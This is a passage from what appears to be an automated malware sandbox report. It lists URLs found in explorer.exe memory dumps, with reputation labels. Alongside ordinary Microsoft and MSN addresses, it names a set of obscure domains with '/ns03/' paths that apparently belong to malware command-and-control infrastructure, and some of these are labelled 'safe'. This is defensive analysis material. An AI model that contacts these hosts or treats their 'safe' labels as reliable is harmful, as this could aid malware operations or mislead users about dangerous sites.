                                                  http://www.yedxec.xyz/ns03/explorer.exe, 00000003.00000002.3834090236.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2284258372.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3075845709.0000000009255000.00000004.00000001.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  https://excel.office.comexplorer.exe, 00000003.00000000.1390264939.000000000BBB0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3836964822.000000000BBB0000.00000004.00000001.00020000.00000000.sdmpfalse
                                                    		high
                                                    https://www.msn.com/en-us/money/personalfinance/the-big-3-mistakes-financial-advisors-say-that-the-1explorer.exe, 00000003.00000003.2286200010.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3831541427.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1375183688.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2739303761.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3076473587.0000000006F33000.00000004.00000001.00020000.00000000.sdmpfalse
                                                      		high
                                                      http://www.engagenotrage.comexplorer.exe, 00000003.00000002.3834090236.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2284258372.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3075845709.0000000009255000.00000004.00000001.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://www.velvetgloveseasonings.storeReferer:explorer.exe, 00000003.00000002.3834090236.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2284258372.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3075845709.0000000009255000.00000004.00000001.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://www.beatricesswarthout.xyzexplorer.exe, 00000003.00000002.3834090236.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2284258372.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3075845709.0000000009255000.00000004.00000001.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://www.gildedbeautyaesthitics.comexplorer.exe, 00000003.00000002.3834090236.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2284258372.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3075845709.0000000009255000.00000004.00000001.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://www.leclandesparents.comexplorer.exe, 00000003.00000002.3834090236.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2284258372.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3075845709.0000000009255000.00000004.00000001.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://www.grupooceanique.com/ns03/explorer.exe, 00000003.00000002.3834090236.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2284258372.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3075845709.0000000009255000.00000004.00000001.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://www.taiyuanbaoyang.com/ns03/www.beatricesswarthout.xyzexplorer.exe, 00000003.00000002.3834090236.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2284258372.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3075845709.0000000009255000.00000004.00000001.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://www.gildedbeautyaesthitics.com/ns03/explorer.exe, 00000003.00000002.3834090236.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2284258372.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3075845709.0000000009255000.00000004.00000001.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      https://upload.wikimedia.org/wikipedia/commons/thumb/8/84/Zealandia-Continent_map_en.svg/1870px-Zealexplorer.exe, 00000003.00000003.2286200010.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3831541427.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1375183688.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2739303761.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3076473587.0000000006F33000.00000004.00000001.00020000.00000000.sdmpfalse
                                                        		high
                                                        http://www.gildedbeautyaesthitics.com/ns03/www.maxhealthunity.comexplorer.exe, 00000003.00000002.3834090236.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2284258372.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3075845709.0000000009255000.00000004.00000001.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        http://www.gildedbeautyaesthitics.comReferer:explorer.exe, 00000003.00000002.3834090236.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2284258372.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3075845709.0000000009255000.00000004.00000001.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        http://www.leclandesparents.com/ns03/www.yedxec.xyzexplorer.exe, 00000003.00000002.3834090236.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2284258372.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3075845709.0000000009255000.00000004.00000001.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        http://www.maxhealthunity.comexplorer.exe, 00000003.00000002.3834090236.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2284258372.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3075845709.0000000009255000.00000004.00000001.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        http://www.microsoft.cexplorer.exe, 00000003.00000003.2284258372.0000000009237000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3075845709.0000000009237000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1380877734.0000000009237000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3834090236.0000000009237000.00000004.00000001.00020000.00000000.sdmpfalse
                                                        • URL Reputation: safe
                                                        		unknown
                                                        https://android.notify.windows.com/iOSdexplorer.exe, 00000003.00000002.3836964822.000000000BCB7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1390264939.000000000BC80000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2739539954.000000000BCB7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3076012374.000000000BCB7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2286423731.000000000BCB4000.00000004.00000001.00020000.00000000.sdmpfalse
                                                          		high
                                                          http://www.scheuermannworks.comexplorer.exe, 00000003.00000002.3834090236.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2284258372.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3075845709.0000000009255000.00000004.00000001.00020000.00000000.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          https://assets.msn.com/weathermapdata/1/static/weather/taskbar/animation/WeatherInsights/WeatherInsiexplorer.exe, 00000003.00000003.2286200010.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3831541427.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1375183688.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2739303761.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3076473587.0000000006F33000.00000004.00000001.00020000.00000000.sdmpfalse
                                                            		high
                                                            http://www.beatricesswarthout.xyz/ns03/www.engagenotrage.comexplorer.exe, 00000003.00000002.3834090236.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2284258372.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3075845709.0000000009255000.00000004.00000001.00020000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            http://www.velvetgloveseasonings.store/ns03/www.gildedbeautyaesthitics.comexplorer.exe, 00000003.00000002.3834090236.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2284258372.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3075845709.0000000009255000.00000004.00000001.00020000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            http://www.autoitscript.com/autoit3/Jexplorer.exe, 00000003.00000003.2286200010.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1375183688.0000000006F0F000.00000004.00000001.00020000.00000000.sdmpfalse
                                                              		high
                                                              http://www.beatricesswarthout.xyzReferer:explorer.exe, 00000003.00000002.3834090236.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2284258372.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3075845709.0000000009255000.00000004.00000001.00020000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              http://www.elizabethsbookshelf.com/ns03/explorer.exe, 00000003.00000002.3834090236.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2284258372.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3075845709.0000000009255000.00000004.00000001.00020000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              http://www.elizabethsbookshelf.comexplorer.exe, 00000003.00000002.3834090236.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2284258372.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3075845709.0000000009255000.00000004.00000001.00020000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earningsexplorer.exe, 00000003.00000003.3076473587.0000000006F33000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                		high
                                                                http://www.maxhealthunity.comReferer:explorer.exe, 00000003.00000002.3834090236.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2284258372.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3075845709.0000000009255000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                http://www.leclandesparents.comReferer:explorer.exe, 00000003.00000002.3834090236.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2284258372.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3075845709.0000000009255000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13fcaT-darkexplorer.exe, 00000003.00000003.2286200010.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3831541427.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1375183688.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2739303761.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3076473587.0000000006F33000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  http://www.agathis.fun/ns03/explorer.exe, 00000003.00000002.3834090236.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2284258372.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3075845709.0000000009255000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  		unknown
                                                                  http://www.maxhealthunity.com/ns03/www.fonbnk.proexplorer.exe, 00000003.00000002.3834090236.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2284258372.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3075845709.0000000009255000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  		unknown
                                                                  https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNewexplorer.exe, 00000003.00000003.2286200010.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3831541427.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1375183688.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2739303761.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3076473587.0000000006F33000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    http://www.scheuermannworks.com/ns03/explorer.exe, 00000003.00000002.3834090236.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2284258372.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3075845709.0000000009255000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    		unknown
                                                                    http://www.scheuermannworks.com/ns03/www.fichaphuman.netexplorer.exe, 00000003.00000002.3834090236.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2284258372.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3075845709.0000000009255000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    		unknown
                                                                    http://www.yedxec.xyz/ns03/www.chuanruhaomen.comexplorer.exe, 00000003.00000002.3834090236.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2284258372.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3075845709.0000000009255000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    		unknown
                                                                    https://outlook.comexplorer.exe, 00000003.00000000.1390264939.000000000BBB0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3836964822.000000000BBB0000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      http://www.yedxec.xyzReferer:explorer.exe, 00000003.00000002.3834090236.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2284258372.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3075845709.0000000009255000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                      • Avira URL Cloud: safe
                                                                      		unknown
                                                                      https://www.cloudflare.com/5xx-error-landingexplorer.exe, 00000003.00000002.3839608270.00000000108DF000.00000004.80000000.00040000.00000000.sdmp, help.exe, 00000004.00000002.3828239347.0000000003CFF000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                        		high
                                                                        http://www.engagenotrage.com/ns03/explorer.exe, 00000003.00000002.3834090236.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2284258372.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3075845709.0000000009255000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                        • Avira URL Cloud: safe
                                                                        		unknown
                                                                        https://android.notify.windows.com/iOSexplorer.exe, 00000003.00000002.3836964822.000000000BCB7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1390264939.000000000BC80000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2739539954.000000000BCB7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3076012374.000000000BCB7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2286423731.000000000BCB4000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                          		high
                                                                          https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppexplorer.exe, 00000003.00000002.3836964822.000000000BCB7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1390264939.000000000BC80000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2739539954.000000000BCB7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3076012374.000000000BCB7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2286423731.000000000BCB4000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                            		high
                                                                            https://www.msn.com/en-us/news/us/dumb-and-dumber-12-states-with-the-absolute-worst-education-in-theexplorer.exe, 00000003.00000003.2286200010.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3831541427.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1375183688.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2739303761.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3076473587.0000000006F33000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                              		high
                                                                              https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/MostlyClearNight.svgexplorer.exe, 00000003.00000003.3076473587.0000000006F33000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                		high
                                                                                https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gKBAexplorer.exe, 00000003.00000003.2286200010.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3831541427.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1375183688.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2739303761.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3076473587.0000000006F33000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                  		high
                                                                                  http://www.leclandesparents.com/ns03/explorer.exe, 00000003.00000002.3834090236.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2284258372.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3075845709.0000000009255000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                  • Avira URL Cloud: safe
                                                                                  		unknown
                                                                                  http://www.repair-services.todayReferer:explorer.exe, 00000003.00000002.3834090236.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2284258372.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3075845709.0000000009255000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                  • Avira URL Cloud: safe
                                                                                  		unknown
                                                                                  http://www.scheuermannworks.comReferer:explorer.exe, 00000003.00000002.3834090236.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2284258372.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3075845709.0000000009255000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                  • Avira URL Cloud: safe
                                                                                  		unknown
                                                                                  http://www.repair-services.todayexplorer.exe, 00000003.00000002.3834090236.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2284258372.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3075845709.0000000009255000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                  • Avira URL Cloud: safe
                                                                                  		unknown
                                                                                  https://www.msn.com/en-us/sports/other/washington-state-ad-asks-ncaa-for-compassion-and-understandinexplorer.exe, 00000003.00000003.2286200010.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3831541427.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1375183688.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2739303761.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3076473587.0000000006F33000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                    		high
                                                                                    http://www.fonbnk.pro/ns03/www.scheuermannworks.comexplorer.exe, 00000003.00000002.3834090236.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2284258372.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3075845709.0000000009255000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                    • Avira URL Cloud: safe
                                                                                    		unknown
                                                                                    https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gF9k-darkexplorer.exe, 00000003.00000003.2286200010.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3831541427.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1375183688.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2739303761.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3076473587.0000000006F33000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                      		high
                                                                                      https://api.msn.com/v1/news/Feed/Windows?explorer.exe, 00000003.00000000.1380877734.00000000090DA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2284258372.00000000090DA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3833748992.00000000090DA000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                        		high
                                                                                        https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13fcaTexplorer.exe, 00000003.00000003.2286200010.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3831541427.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1375183688.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2739303761.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3076473587.0000000006F33000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                          		high
                                                                                          http://www.fichaphuman.netReferer:explorer.exe, 00000003.00000002.3834090236.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2284258372.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3075845709.0000000009255000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                          • Avira URL Cloud: safe
                                                                                          		unknown
                                                                                          http://www.fichaphuman.net/ns03/www.elizabethsbookshelf.comexplorer.exe, 00000003.00000002.3834090236.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2284258372.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3075845709.0000000009255000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                          • Avira URL Cloud: safe
                                                                                          		unknown
                                                                                          http://www.engagenotrage.com/ns03/www.velvetgloveseasonings.storeexplorer.exe, 00000003.00000002.3834090236.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2284258372.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3075845709.0000000009255000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                          • Avira URL Cloud: safe
                                                                                          		unknown
                                                                                          https://www.msn.com/en-us/weather/topstories/first-map-of-earth-s-lost-continent-has-been-published/explorer.exe, 00000003.00000003.2286200010.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3831541427.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1375183688.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2739303761.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3076473587.0000000006F33000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                            		high
                                                                                            http://www.taiyuanbaoyang.comReferer:explorer.exe, 00000003.00000002.3834090236.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2284258372.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3075845709.0000000009255000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                            • Avira URL Cloud: safe
                                                                                            		unknown
                                                                                            https://www.msn.com/en-us/news/politics/kinzinger-has-theory-about-who-next-house-speaker-will-be/viexplorer.exe, 00000003.00000003.2286200010.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3831541427.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1375183688.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2739303761.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3076473587.0000000006F33000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                              		high
                                                                                              https://www.msn.com/en-us/money/careersandeducation/student-loan-debt-forgiveness-arrives-for-some-bexplorer.exe, 00000003.00000003.2286200010.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3831541427.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1375183688.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2739303761.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3076473587.0000000006F33000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                		high
                                                                                                http://schemas.microexplorer.exe, 00000003.00000002.3832797190.0000000007710000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000000.1373381409.0000000002C80000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000000.1378345938.0000000007720000.00000002.00000001.00040000.00000000.sdmpfalse
                                                                                                • URL Reputation: safe
                                                                                                		unknown
                                                                                                http://www.elizabethsbookshelf.comReferer:explorer.exe, 00000003.00000002.3834090236.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2284258372.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3075845709.0000000009255000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                • Avira URL Cloud: safe
                                                                                                		unknown
                                                                                                https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Teaser/recordhigh.svgexplorer.exe, 00000003.00000003.2286200010.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3831541427.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1375183688.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2739303761.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3076473587.0000000006F33000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                  		high
                                                                                                  http://www.fonbnk.proReferer:explorer.exe, 00000003.00000002.3834090236.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2284258372.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3075845709.0000000009255000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                  • Avira URL Cloud: safe
                                                                                                  		unknown
                                                                                                  https://wns.windows.com/EM0explorer.exe, 00000003.00000003.3076012374.000000000BDF5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1390264939.000000000BDF5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2739539954.000000000BDF5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2286423731.000000000BDF5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3836964822.000000000BDF5000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                    		high
